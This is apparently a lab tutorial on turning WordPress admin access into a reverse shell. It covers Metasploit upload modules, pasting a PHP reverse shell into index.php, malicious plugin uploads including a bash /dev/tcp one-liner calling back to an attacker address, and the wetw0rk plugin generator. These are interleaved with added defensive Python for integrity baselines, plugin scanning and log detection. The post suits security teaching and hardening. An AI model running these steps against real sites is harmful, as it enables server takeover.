WordPress: Reverse Shell

This post focuses on WordPress security testing to explore the procedures for exploiting WordPress by compromising the admin console. We have already set up WordPress on our local machine, but if you want to learn about WordPress installation and configuration, please visit the link below:

WordPress Lab Setup in Ubuntu

WPScan is a standalone tool for identifying vulnerable plugins and themes in WordPress; this post, however, does not cover WPScan.

Table of Contents

  • Metasploit Framework
  • Injecting Malicious Code
  • Inject Malicious Plugin
  • Inject custom Malicious Plugin
  • WetW0rk – Malicious WordPress Plugin

Requirements:

Host machine: WordPress

Attacker machine: Kali Linux

WordPress Credential: raj: 123 (in our case)

Let’s begin!!

As you can see, I have access to the WordPress admin console via the web browser. To obtain a web shell, we need to exploit this CMS. There are multiple methods to exploit WordPress; let’s explore some of these operations.

Metasploit Framework

The first method involves using the Metasploit framework. This module requires an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is an authenticated code execution by design, it should work on all versions of WordPress, resulting in a Meterpreter session to the webserver.

msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit

Great! It works perfectly, and as you can see, we have successfully obtained a reverse connection to the web server via a Meterpreter session.

Injecting Malicious Code

Another technique to spawn web server shells involves injecting malicious code. If you have an administrator’s username and password, log in to the admin panel and inject malicious PHP code into the index.php file, which is the entry point of the website.

To do this, navigate to the WordPress dashboard, click on “Plugins” in the left-hand menu, and then click “Add New.”

In the search bar, type “Advanced File Manager” and locate the plugin by “modalweb.”

Install and Activate the Plugin:

Click “Install Now” and then “Activate” to enable the plugin on your WordPress site.

Once activated, go to the “File Manager” option in the left-hand menu.

Use the file manager to navigate the file system of your WordPress installation. This interface allows you to view, upload, and edit files directly.

In WordPress, right-click on index.php and select “Edit.” Before making any changes, create a duplicate of the file so that you can restore it later if needed.

On Kali, open /usr/share/webshells/php/php-reverse-shell.php and copy its contents.

Paste that code into the index.php file, replacing the IP address and port with your Kali machine’s IP and the listener port. Then click the ‘Save and Close’ button.

Next, open a terminal on your Kali machine and start Netcat:

rlwrap nc -lvnp 1234

Now load the WordPress page in another browser tab; the modified index.php runs on every page load and should hand the reverse shell to the listener.
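The technique above works because index.php is loaded on every request, so a single edited core file is enough. From the defender's side, the counterpart is a file-integrity baseline: hash every PHP file in the document root while the site is known-good, keep the hashes outside the web root, and diff against them on a schedule. The following is an added example written for this post, not code from the original article; it builds a small constructed WordPress-like tree in a temporary directory, baselines it, then replays the two changes the post makes (index.php overwritten, a new plugin file dropped) and reports the differences.

```python
"""Integrity baseline for a WordPress document root (added example)."""
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List


def hash_tree(root: str) -> Dict[str, str]:
    """Map each PHP file under root (relative POSIX path) to its SHA-256."""
    root_path = Path(root)
    digests: Dict[str, str] = {}
    for path in sorted(root_path.rglob("*.php")):
        if path.is_file():
            rel = path.relative_to(root_path).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def save_baseline(root: str, baseline_file: str) -> None:
    """Write the current hashes to a JSON file; keep it outside the web root."""
    Path(baseline_file).write_text(json.dumps(hash_tree(root), indent=1))


def verify_tree(root: str, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Diff the live tree against a baseline: modified, added and removed PHP files."""
    current = hash_tree(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed site: baseline it, then replay the two changes from the post
    (index.php overwritten, a new plugin file dropped) and report the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        plugins = root / "wp-content" / "plugins"
        (plugins / "hello").mkdir(parents=True)
        # Stock WordPress index.php content.
        (root / "index.php").write_text(
            "<?php\ndefine( 'WP_USE_THEMES', true );\nrequire __DIR__ . '/wp-blog-header.php';\n"
        )
        (plugins / "hello" / "hello.php").write_text("<?php\n/* Plugin Name: Hello Dolly */\n")
        baseline = hash_tree(tmp)

        # Simulated tampering (constructed placeholder content, nothing is executed).
        (root / "index.php").write_text("<?php\n// constructed: attacker-supplied code would sit here\n")
        (plugins / "revshell").mkdir()
        (plugins / "revshell" / "revshell.php").write_text("<?php\n/* Plugin Name: revshell */\n")
        return verify_tree(tmp, baseline)


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

For WordPress core files specifically, WP-CLI's `wp core verify-checksums` performs the same comparison against the official checksums for the installed version, so a self-maintained baseline is mainly needed for plugins, themes and wp-config.php. Run the check from a cron job or a monitoring agent rather than from inside WordPress, since anything with admin access to the dashboard (as in this post) can also tamper with a check that lives there.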

Inject Malicious Plugin

Sometimes, logged-on users may not have the necessary write permissions to modify the WordPress theme. In such cases, injecting a malicious WP plugin is an alternative strategy for acquiring a web shell.

Once you have access to the WordPress dashboard, you can attempt to install a malicious plugin. In this example, I have already downloaded a vulnerable plugin from Exploit DB.

Click here to download the plugin for practice.

Now that we have the ZIP file for the plugin, it’s time to upload it.

Dashboard > plugins > upload plugin

In the “Plugins” menu, click “Add New” and then “Upload Plugin”. Choose your malicious plugin ZIP file and click “Install Now”.

After uploading, click “Activate” to enable the plugin.

Once everything is properly set up, you can proceed with exploitation. We have installed a vulnerable plugin called “reflex-gallery,” which is known to be easily exploitable.

To exploit this vulnerability, you can use the Metasploit framework. Load the following module and execute the provided command:

use exploit/unix/webapp/wp_reflexgallery_file_upload
set rhosts 192.168.31.205
set targeturi /wordpress
exploit

After executing the above commands, you will establish a Meterpreter session. As demonstrated in this article, there are various methods to exploit a website built on the WordPress platform.

Inject custom Malicious Plugin

As demonstrated earlier, we uploaded a vulnerable plugin with a readily available exploit. This time, we will inject our custom-generated malicious plugin to obtain a reverse shell. The process is straightforward: we have saved the reverse shell’s malicious code in a PHP file named “revshell.php” and compressed it into a ZIP file.

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'")

Repeat the previous steps to upload the “revshell.zip” plugin file, then start a Netcat listener to receive the reverse connection from the target machine.

Once the package gets installed successfully, we need to activate the plugin.

As soon as you activate the plugin, it will establish a reverse connection, creating a Netcat session.
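Every method in this post so far depends on the dashboard being allowed to install plugins or edit files. WordPress honours two constants in wp-config.php that close those paths: DISALLOW_FILE_EDIT removes the built-in theme/plugin code editor, and DISALLOW_FILE_MODS additionally blocks plugin and theme installation, upload and update through the dashboard. The following added example (written for this post, not code from the original article or any WordPress project) audits a wp-config.php for those constants, ignoring commented-out lines, and scans an installed plugin tree for the kinds of source that appear in the post's payloads: a shell redirected to /dev/tcp, an OS command taken straight from a request parameter, the fsockopen-then-proc_open shape of php-reverse-shell, and eval of an obfuscated blob. The sample plugins are constructed fixtures that mirror the post's revshell.php and the wetw0rk SWebTheme.php?cmd=ls endpoint.

```python
"""Audit the plugin-upload path: wp-config.php hardening flags and a scan of
installed plugin sources for shell-like code (added example)."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Constants WordPress reads from wp-config.php:
#   DISALLOW_FILE_EDIT  removes the dashboard theme/plugin code editor
#   DISALLOW_FILE_MODS  also blocks plugin/theme install, upload and update
HARDENING_CONSTANTS = ("DISALLOW_FILE_EDIT", "DISALLOW_FILE_MODS")
DEFINE_RE = re.compile(r"""define\s*\(\s*['"](\w+)['"]\s*,\s*(true|false)\s*\)""", re.IGNORECASE)

# Source patterns a legitimate plugin has no business containing.
SUSPICIOUS_PATTERNS = [
    ("shell redirected to /dev/tcp", re.compile(r"/dev/tcp/")),
    ("command execution fed from a request parameter",
     re.compile(r"\b(?:exec|system|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST)\b")),
    ("socket opened then handed to a process (php-reverse-shell style)",
     re.compile(r"fsockopen\s*\(.*proc_open\s*\(", re.DOTALL)),
    ("eval of an obfuscated payload",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(")),
]


def audit_wp_config(config_text: str) -> Dict[str, bool]:
    """Return which hardening constants are defined true (commented lines ignored)."""
    enabled: Dict[str, bool] = {}
    for line in config_text.splitlines():
        stripped = line.strip()
        if stripped.startswith(("//", "#", "*", "/*")):
            continue
        for name, value in DEFINE_RE.findall(stripped):
            enabled[name.upper()] = value.lower() == "true"
    return {name: enabled.get(name, False) for name in HARDENING_CONSTANTS}


def scan_plugins(plugins_dir: str) -> List[Dict[str, object]]:
    """Walk wp-content/plugins and report every PHP file matching a suspicious pattern."""
    findings: List[Dict[str, object]] = []
    base = Path(plugins_dir)
    for php in sorted(base.rglob("*.php")):
        source = php.read_text(errors="replace")
        hits = [label for label, rx in SUSPICIOUS_PATTERNS if rx.search(source)]
        if hits:
            findings.append({"file": php.relative_to(base).as_posix(), "hits": hits})
    return findings


def demo() -> Dict[str, object]:
    """Constructed wp-config.php and plugin tree mirroring the post's scenario."""
    wp_config = (
        "<?php\n"
        "define( 'DB_NAME', 'wordpress' );\n"
        "// define( 'DISALLOW_FILE_MODS', true );   // commented out: not in effect\n"
        "define( 'DISALLOW_FILE_EDIT', true );\n"
    )
    with tempfile.TemporaryDirectory() as tmp:
        plugins = Path(tmp)
        (plugins / "hello").mkdir()
        (plugins / "hello" / "hello.php").write_text(
            "<?php\n/* Plugin Name: Hello Dolly */\nfunction hello_dolly() { echo 'Hello'; }\n"
        )
        (plugins / "revshell").mkdir()
        # Constructed fixture reproducing the one-liner quoted in the post.
        (plugins / "revshell" / "revshell.php").write_text(
            "<?php\n/* Plugin Name: revshell */\n"
            "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'\");\n"
        )
        (plugins / "malicious").mkdir()
        # Constructed fixture of a cmd= style endpoint like the post's SWebTheme.php?cmd=ls.
        (plugins / "malicious" / "SWebTheme.php").write_text("<?php\nsystem($_GET['cmd']);\n")
        return {"config": audit_wp_config(wp_config), "plugins": scan_plugins(tmp)}


if __name__ == "__main__":
    result = demo()
    print("wp-config hardening:", result["config"])
    for finding in result["plugins"]:
        print(f"{finding['file']}: {', '.join(finding['hits'])}")
```

Pattern scanning is a triage aid, not proof: a file with no hits can still be malicious (the patterns can be split across string concatenation or variable functions), so treat the integrity baseline and the wp-config flags as the primary controls and this scan as a quick first pass over a suspect plugin directory. With DISALLOW_FILE_MODS in place, every upload step in this post fails at the dashboard even with valid admin credentials.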

WetW0rk – Malicious WordPress Plugin

First, we need to download the malicious WordPress plugin from GitHub. This plugin contains the code necessary to exploit the WordPress installation.

Open a terminal on your Kali Linux machine and use the following command to clone the repository:

git clone https://github.com/wetw0rk/malicious-wordpress-plugin

Change to the directory containing the cloned repository.

Next, we need to generate the malicious plugin that will be uploaded to the WordPress site to exploit it.

Use the wordpwn.py script from the cloned repository to generate the plugin. Replace <Kali_IP> with your Kali machine’s IP address and 8888 with the desired port number:

python wordpwn.py <Kali_IP> 8888 Y

After running the script, make a note of the URLs provided for triggering the reverse shell. These URLs will be used later to establish the connection.

http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.php
http://(target)/wp-content/plugins/malicious/QwertyRocks.php
http://(target)/wp-content/plugins/malicious/SWebTheme.php?cmd=ls

The script also launches the Metasploit Framework as part of the process and leaves it waiting for the reverse shell.

Now that we have generated the malicious plugin, we can proceed with uploading it to the WordPress site to exploit it.

Upload the plugin as we did earlier.
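The URLs the script prints above are the detection opportunity: every technique in this post needs a plugin package to be uploaded through the dashboard and then a PHP file under wp-content/plugins to be requested directly, often with a command-style query parameter. The following added example (written for this post; not code from the wetw0rk project or the original article) parses web-server access-log lines in the common "combined" format and flags those three events. The log lines are constructed samples using the post's /wordpress targeturi and the wetw0rk file names, not a capture from a real server.

```python
"""Flag access-log lines consistent with the plugin-upload and direct
plugin-file techniques described in the post (added example)."""
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format; only the fields used here are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Query parameter names commonly used to carry an OS command to a dropped PHP file.
COMMAND_PARAMS = {"cmd", "c", "exec", "command"}


def classify(line: str) -> Dict[str, object]:
    """Return the parsed fields plus the reasons the request looks like
    plugin-based shell activity (an empty list means nothing noteworthy)."""
    m = LOG_RE.match(line)
    if not m:
        return {"reasons": ["unparsable line"], "raw": line}
    parts = urlsplit(m["target"])
    path, query = parts.path, parse_qs(parts.query)
    reasons: List[str] = []

    # Plugin package uploaded through the dashboard.
    if path.endswith("/wp-admin/update.php") and query.get("action") == ["upload-plugin"]:
        reasons.append("plugin upload via dashboard")
    # Plugin activation; the post's custom plugin fires its payload at this step.
    if path.endswith("/wp-admin/plugins.php") and query.get("action") == ["activate"]:
        reasons.append("plugin activation")
    # A PHP file under wp-content/plugins requested directly rather than through WordPress.
    if "/wp-content/plugins/" in path and path.endswith(".php"):
        reasons.append("direct request to plugin PHP file")
        if COMMAND_PARAMS & set(query):
            reasons.append("command-style query parameter")
    return {"ip": m["ip"], "method": m["method"], "target": m["target"],
            "status": m["status"], "reasons": reasons}


def detect(lines: List[str]) -> List[Dict[str, object]]:
    """Keep only the entries that have at least one reason."""
    return [entry for entry in (classify(ln) for ln in lines) if entry["reasons"]]


# Constructed sample log (not from any real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/May/2024:10:00:01 +0000] "GET /wordpress/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/May/2024:10:00:02 +0000] "GET /wordpress/wp-content/plugins/hello/style.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/May/2024:10:01:02 +0000] "POST /wordpress/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/May/2024:10:01:04 +0000] "GET /wordpress/wp-admin/plugins.php?action=activate&plugin=malicious%2Fmalicious.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/May/2024:10:01:09 +0000] "GET /wordpress/wp-content/plugins/malicious/SWebTheme.php?cmd=ls HTTP/1.1" 200 311 "-" "curl/8.0"',
    '203.0.113.5 - - [10/May/2024:10:01:12 +0000] "GET /wordpress/wp-content/plugins/malicious/wetw0rk_maybe.php HTTP/1.1" 200 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit["ip"], hit["method"], hit["target"], "->", "; ".join(hit["reasons"]))
```

Some legitimate plugins do expose PHP endpoints that browsers call directly, so the "direct request" reason alone needs a baseline of known plugin paths before it is alertable; an upload from the dashboard followed within seconds by a direct request to a new file under the plugin just installed, as in the sample above, is the high-confidence sequence. Correlating the source IP with the admin login in WordPress's own logs (or an audit-log plugin) also tells you which account's credentials were used, which is the first thing to reset.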

Author: Phil Kalluri is a cybersecurity and business automation consultant specializing in securing IT infrastructures and streamlining operations for SMBs, particularly in the healthcare and education sectors.